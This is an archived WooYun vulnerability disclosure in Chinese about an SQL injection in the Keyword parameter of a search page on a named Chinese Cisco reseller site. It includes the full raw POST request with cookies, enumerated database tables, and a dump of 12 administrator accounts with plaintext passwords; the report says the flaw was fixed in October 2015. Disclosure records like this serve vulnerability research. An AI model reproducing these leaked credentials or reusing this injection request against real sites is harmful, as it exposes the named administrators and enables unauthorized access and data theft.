乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-11: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-19: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
神州数码思科网络加油站 如下链接存在SQL注入,其中,Keyword参数有问题
POST /Search.jsp?Result=products HTTP/1.1Host: www.ciscostation.com.cnUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.ciscostation.com.cn/Search.jspCookie: ASPSESSIONIDASQSBBAB=KMBOAHBAOMHLDEKFFAKCHJMA; CNZZDATA2213581=cnzz_eid%3D1781471836-1441885202-http%253A%252F%252Fwww.ciscostation.com.cn%252F%26ntime%3D1441885202; news=%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u8D44%u8BAF%u4E2D%u5FC3^http%3A//www.ciscostation.com.cn/NewsList.jsp%3FSortID%3D1$%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u8D44%u8BAF%u4E2D%u5FC3-%u601D%u79D1%u6760%u4E0AVMware%20%u8F6F%u786C%u4E4B%u4E89%u62A2%u593ASDN%u5927%u9910^http%3A//www.ciscostation.com.cn/NewsView.jsp%3FID%3D3364$%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u4F1A%u5458%u767B%u5F55^http%3A//www.ciscostation.com.cn/login.jsp$%u795E%u5DDE%u6570%u7801%u601D%u79D1%u7F51%u7EDC%u52A0%u6CB9%u7AD9-%u7AD9%u5185%u641C%u7D22^http%3A//www.ciscostation.com.cn/Search.jsp$|; bdshare_firstime=1441885200707Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 44Keyword=%E6%9F%A5%E8%AF%A2%E4%BA%A7%E5%93%81
发现6个库
以cisstation库为例,发现大量表
Database: cisstation+----------------------+---------+| Table | Entries |+----------------------+---------+| hyjltable | 43973 || ucssn | 32243 || scorelog | 14028 || bbstiezi | 7714 || classname | 5653 || qianbo_news | 3345 || moneyjl | 3320 || application | 3282 || cases | 2954 || bbshuiyuan | 2810 || equiptmentnum | 2789 || personnum | 1551 || response | 1063 |
以admin表为例,网站管理员的账号和密码泄露
Database: cisstationTable: admin[12 entries]+----+------------+-----------+-----------+----------+------------+| id | Explain | AdminName | Password | UserName | AddTime |+----+------------+-----------+-----------+----------+------------+| 1 | 拥有全部权限 | admin | 000000 | 超级管理员 | 2012-01-01 || 2 | 拥有全部文章管理权限 | xiaomiao | 99mojod5 | 文章管理员 | 2012-01-01 || 10 | UCS | uscdf | www345 | 郑方 | 2012-06-07 || 11 | quyu | xqadmin | 000000 | 西区 | 2012-06-11 || 12 | quyu | nqadmin | 000000 | 南区 | 2012-06-11 || 13 | quyu | bqadmin | 000000 | 北区 | 2012-06-11 || 14 | quyu | dqadmin | 000000 | 东区 | 2012-06-11 || 15 | quyu | hzadmin | 000000 | 华中区 | 2012-06-11 || 28 | UCS | ucsadmin | 000000 | UCS管理员 | 2012-06-07 || 31 | fuwu | fwadmin | 2012fw | 服务管理员 | 2012-11-01 || 32 | PAI | auction | admin9982 | 拍卖管理员 | 2013-03-01 || 33 | yinhe | sradmin | yinhe | 银河管理员 | 2013-07-01 |+----+------------+-----------+-----------+----------+------------+
危害等级:高
漏洞Rank:15
确认时间:2015-09-11 10:26
尽快处理
2015-10-19:已修复